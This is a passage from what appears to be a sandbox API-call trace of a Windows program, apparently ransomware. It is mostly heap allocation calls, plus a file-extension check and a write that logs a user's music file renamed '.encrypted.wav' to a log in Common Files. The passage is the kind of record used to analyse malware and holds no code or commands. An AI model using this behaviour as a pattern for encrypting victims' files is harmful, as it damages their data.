(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.602] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.602] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0038.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.603] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.603] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.603] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.603] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.603] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.603] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.603] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.603] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.603] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x25e8, lpOverlapped=0x0) returned 1 [0038.604] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.604] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x25e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.604] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.encrypted.wav\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0038.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.encrypted.wav\r\n", cchWideChar=64, lpMultiByteStr=0x7ab338, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 64 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.604] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3f, lpOverlapped=0x0) returned 1 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.604] CloseHandle (hObject=0x128) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.605] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.607] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.607] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.607] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.607] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.608] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.610] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.611] RtlAllocateHeap 